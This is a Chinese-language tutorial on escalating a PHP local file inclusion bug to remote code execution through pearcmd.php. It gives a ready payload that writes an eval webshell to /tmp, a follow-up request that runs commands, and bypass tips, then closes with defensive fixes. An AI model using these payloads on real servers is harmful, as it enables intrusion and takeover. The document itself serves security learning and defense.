本文介绍了如何利用 PHP 的 PEAR 扩展管理工具在存在 LFI 漏洞的情况下进行攻击。通过构造特殊的 URL Payload,攻击者可以利用 pearcmd.php 脚本来创建包含恶意 PHP 代码的文件,实现远程代码执行(RCE)。文章详细阐述了核心原理、前置条件、攻击流程、潜在限制以及防御建议,强调了在生产环境中应关闭 register_argc_argv 设置,并卸载 PEAR,以增强安全性。
在php7.3及以前,pear是默认安装的;在7.4及以后,需要我们在编译PHP的时候指定--with-pear才会安装
1. 核心原理 (The Core Concept)
利用场景:当你拥有一个 LFI 漏洞,但无法上传文件,且目标服务器(通常是 Docker 容器)安装了 PHP 的 PEAR 扩展管理工具。 攻击逻辑:
- LFI 包含:通过漏洞包含服务器上的
pearcmd.php脚本。 - CLI 欺骗:利用 PHP 的
register_argc_argv特性,通过 HTTP URL 的查询字符串(Query String)向pearcmd.php传递命令行参数。 - 文件写入:调用 PEAR 的
config-create指令,将恶意 PHP 代码作为“配置参数”写入到服务器的可写目录(如/tmp),生成 Webshell。
2. 前置条件 (Prerequisites)
攻击成功的“三要素”:
- LFI 漏洞存在:能够包含任意路径的文件。
register_argc_argv = On:- pearcmd.php 存在:
3. 攻击流程与 Payload 详解
第一步:构造恶意 Payload
我们需要构造一个 URL,既能触发 LFI,又能传递参数给 pearcmd。
标准 Payload 模板:
GET /vulnerable.php?file=../../usr/local/lib/php/pearcmd.php&%2bconfig-create%2b/&/<?php+@eval($_GET['cmd']);?>%2b/tmp/shell.php HTTP/1.1
Payload 逐段解析:
| URL片段 | 作用解析 |
file=...pearcmd.php | 触发 LFI:Web 应用加载并运行 pearcmd 脚本。 |
& | 分隔符:区分 LFI 参数和命令行注入参数(视情况而定)。 |
%2b (即 +) | 空格替代:在 argv 解析中,+ 被转换为空格,用于分隔命令行参数。 |
config-create | 参数 1 (Command):告诉 PEAR 执行“创建默认配置文件”的命令。 |
/&/<?php...?> | 参数 2 (Value):通常是配置文件的根路径。我们注入 PHP 代码。PEAR 会把这个字符串原样写入文件。 |
/tmp/shell.php | 参数 3 (File Path):指定配置文件的保存路径(必须可写)。 |
第二步:服务器内部执行逻辑
当请求发送后,服务器内部发生了什么?
解析 URL:PHP 引擎看到 register_argc_argv=On,将 Query String 解析为数组:
$_SERVER['argv'] = [
0 => 'pearcmd.php', // 脚本名
1 => 'config-create', // 命令
2 => '/&/<?php @eval($_GET[cmd]);?>', // 内容
3 => '/tmp/shell.php' // 目标文件
];
加载脚本:LFI 漏洞包含并运行 pearcmd.php。
执行命令:pearcmd.php 读取 $_SERVER['argv'],认为自己在命令行下运行。
写入文件:执行 config-create,将参数 2 的内容写入参数 3 指定的文件。
第三步:触发 RCE
文件创建成功后,再次利用 LFI 包含这个新生成的文件:
GET /vulnerable.php?file=../../../../tmp/shell.php&cmd=id
结果:执行系统命令 id。
4. 关键限制与绕过 (Troubleshooting)
这是最容易踩坑的地方,请重点记录:
- 限制 1:等号 (
=) 的干扰- 问题:如果 URL Query String 中包含
=(例如?file=...¶m=value),PHP 某些版本可能不会生成$argv,或者 Web 应用可能会处理冲突。 - 解决:
- 尽量让 payload 位于 Query String 的最前面。
- 如果 LFI 点必须用 GET 参数(如
?page=...),这种利用可能会失效。
- 问题:如果 URL Query String 中包含
- 限制 2:路径猜测
- 问题:不知道
pearcmd.php在哪。 - 解决:利用目录扫描工具或读取
phpinfo()。
- 问题:不知道
- 限制 3:权限问题
- 问题:Web 用户(www-data)无法写入
/tmp或被open_basedir限制。 - 解决:尝试写入
/var/tmp/或 Web 目录下的uploads/文件夹。
- 问题:Web 用户(www-data)无法写入
5. 防御建议 (Defense)
- 关闭开关:在
php.ini中设置register_argc_argv = Off(最彻底的修复)。 - 卸载 PEAR:生产环境容器通常不需要 PEAR,构建镜像时应移除。
- 输入验证:严格过滤 LFI 参数,禁止
..和绝对路径。